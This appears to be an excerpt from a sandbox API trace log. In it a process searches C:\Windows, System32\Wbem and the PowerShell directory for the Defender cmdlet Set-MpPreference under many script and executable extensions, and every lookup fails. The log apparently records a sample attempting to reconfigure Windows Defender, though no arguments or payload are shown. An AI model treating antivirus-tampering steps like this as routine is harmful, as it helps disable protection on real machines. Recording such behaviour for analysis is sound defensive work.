	[0063.828] GetLastError () returned 0x2
	[0063.828] SetErrorMode (uMode=0x1) returned 0x1
	[0063.828] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0063.828] GetLastError () returned 0x2
	[0063.828] SetErrorMode (uMode=0x1) returned 0x1
	[0063.828] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.MSC", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.828] GetLastError () returned 0x2
	[0063.828] SetErrorMode (uMode=0x1) returned 0x1
	[0063.828] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0063.828] GetLastError () returned 0x2
	[0063.828] SetErrorMode (uMode=0x1) returned 0x1
	[0063.828] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.828] GetLastError () returned 0x2
	[0063.828] SetErrorMode (uMode=0x1) returned 0x1
	[0063.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0063.828] GetLastError () returned 0x2
	[0063.829] SetErrorMode (uMode=0x1) returned 0x1
	[0063.829] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.ps1", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.829] GetLastError () returned 0x2
	[0063.829] SetErrorMode (uMode=0x1) returned 0x1
	[0063.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0063.829] GetLastError () returned 0x2
	[0063.829] SetErrorMode (uMode=0x1) returned 0x1
	[0063.829] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.psm1", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.829] GetLastError () returned 0x2
	[0063.829] SetErrorMode (uMode=0x1) returned 0x1
	[0063.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0063.829] GetLastError () returned 0x2
	[0063.829] SetErrorMode (uMode=0x1) returned 0x1
	[0063.829] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.psd1", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.830] GetLastError () returned 0x2
	[0063.830] SetErrorMode (uMode=0x1) returned 0x1
	[0063.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0063.830] GetLastError () returned 0x2
	[0063.830] SetErrorMode (uMode=0x1) returned 0x1
	[0063.830] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.COM", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.830] GetLastError () returned 0x2
	[0063.830] SetErrorMode (uMode=0x1) returned 0x1
	[0063.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0063.830] GetLastError () returned 0x2
	[0063.830] SetErrorMode (uMode=0x1) returned 0x1
	[0063.830] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.EXE", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.830] GetLastError () returned 0x2
	[0063.830] SetErrorMode (uMode=0x1) returned 0x1
	[0063.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0063.830] GetLastError () returned 0x2
	[0063.830] SetErrorMode (uMode=0x1) returned 0x1
	[0063.831] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.BAT", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.831] GetLastError () returned 0x2
	[0063.831] SetErrorMode (uMode=0x1) returned 0x1
	[0063.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0063.831] GetLastError () returned 0x2
	[0063.831] SetErrorMode (uMode=0x1) returned 0x1
	[0063.831] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.CMD", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.831] GetLastError () returned 0x2
	[0063.831] SetErrorMode (uMode=0x1) returned 0x1
	[0063.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0063.831] GetLastError () returned 0x2
	[0063.831] SetErrorMode (uMode=0x1) returned 0x1
	[0063.831] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.VBS", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.831] GetLastError () returned 0x2
	[0063.832] SetErrorMode (uMode=0x1) returned 0x1
	[0063.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0063.832] GetLastError () returned 0x2
	[0063.832] SetErrorMode (uMode=0x1) returned 0x1
	[0063.832] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.VBE", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.832] GetLastError () returned 0x2
	[0063.832] SetErrorMode (uMode=0x1) returned 0x1
	[0063.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0063.832] GetLastError () returned 0x2
	[0063.832] SetErrorMode (uMode=0x1) returned 0x1
	[0063.832] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.JS", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.832] GetLastError () returned 0x2
	[0063.832] SetErrorMode (uMode=0x1) returned 0x1
	[0063.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0063.832] GetLastError () returned 0x2
	[0063.832] SetErrorMode (uMode=0x1) returned 0x1
	[0063.832] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.JSE", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.833] GetLastError () returned 0x2
	[0063.833] SetErrorMode (uMode=0x1) returned 0x1
	[0063.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0063.833] GetLastError () returned 0x2
	[0063.833] SetErrorMode (uMode=0x1) returned 0x1
	[0063.833] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.WSF", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.833] GetLastError () returned 0x2
	[0063.833] SetErrorMode (uMode=0x1) returned 0x1
	[0063.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0063.833] GetLastError () returned 0x2
	[0063.833] SetErrorMode (uMode=0x1) returned 0x1
	[0063.833] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.WSH", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.833] GetLastError () returned 0x2
	[0063.833] SetErrorMode (uMode=0x1) returned 0x1
	[0063.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0063.834] GetLastError () returned 0x2
	[0063.834] SetErrorMode (uMode=0x1) returned 0x1
	[0063.834] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.MSC", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.834] GetLastError () returned 0x2
	[0063.834] SetErrorMode (uMode=0x1) returned 0x1
	[0063.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0063.834] GetLastError () returned 0x2
	[0063.834] SetErrorMode (uMode=0x1) returned 0x1
	[0063.834] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.834] GetLastError () returned 0x2
	[0063.834] SetErrorMode (uMode=0x1) returned 0x1
	[0063.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0063.834] GetLastError () returned 0x2
	[0063.834] SetErrorMode (uMode=0x1) returned 0x1
	[0063.834] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.ps1", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.835] GetLastError () returned 0x2
	[0063.835] SetErrorMode (uMode=0x1) returned 0x1
	[0063.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0063.835] GetLastError () returned 0x2
	[0063.835] SetErrorMode (uMode=0x1) returned 0x1
	[0063.835] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.psm1", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.835] GetLastError () returned 0x2
	[0063.835] SetErrorMode (uMode=0x1) returned 0x1
	[0063.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0063.835] GetLastError () returned 0x2
	[0063.835] SetErrorMode (uMode=0x1) returned 0x1
	[0063.835] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.psd1", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.836] GetLastError () returned 0x2
	[0063.836] SetErrorMode (uMode=0x1) returned 0x1
	[0063.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0063.836] GetLastError () returned 0x2
	[0063.836] SetErrorMode (uMode=0x1) returned 0x1
	[0063.836] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.COM", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.837] GetLastError () returned 0x2
	[0063.837] SetErrorMode (uMode=0x1) returned 0x1
	[0063.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0063.837] GetLastError () returned 0x2
	[0063.837] SetErrorMode (uMode=0x1) returned 0x1
	[0063.837] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.EXE", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.837] GetLastError () returned 0x2
	[0063.837] SetErrorMode (uMode=0x1) returned 0x1
	[0063.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0063.837] GetLastError () returned 0x2
	[0063.837] SetErrorMode (uMode=0x1) returned 0x1
	[0063.837] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.BAT", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.837] GetLastError () returned 0x2
	[0063.837] SetErrorMode (uMode=0x1) returned 0x1
	[0063.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0063.838] GetLastError () returned 0x2
	[0063.838] SetErrorMode (uMode=0x1) returned 0x1
	[0063.838] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.CMD", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.838] GetLastError () returned 0x2
	[0063.838] SetErrorMode (uMode=0x1) returned 0x1
	[0063.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0063.838] GetLastError () returned 0x2
	[0063.838] SetErrorMode (uMode=0x1) returned 0x1
	[0063.838] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.VBS", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.838] GetLastError () returned 0x2
	[0063.838] SetErrorMode (uMode=0x1) returned 0x1
	[0063.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0063.838] GetLastError () returned 0x2
	[0063.838] SetErrorMode (uMode=0x1) returned 0x1
	[0063.838] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.VBE", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.839] GetLastError () returned 0x2
	[0063.839] SetErrorMode (uMode=0x1) returned 0x1
	[0063.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0063.839] GetLastError () returned 0x2
	[0063.839] SetErrorMode (uMode=0x1) returned 0x1
	[0063.839] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.JS", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.839] GetLastError () returned 0x2
	[0063.839] SetErrorMode (uMode=0x1) returned 0x1
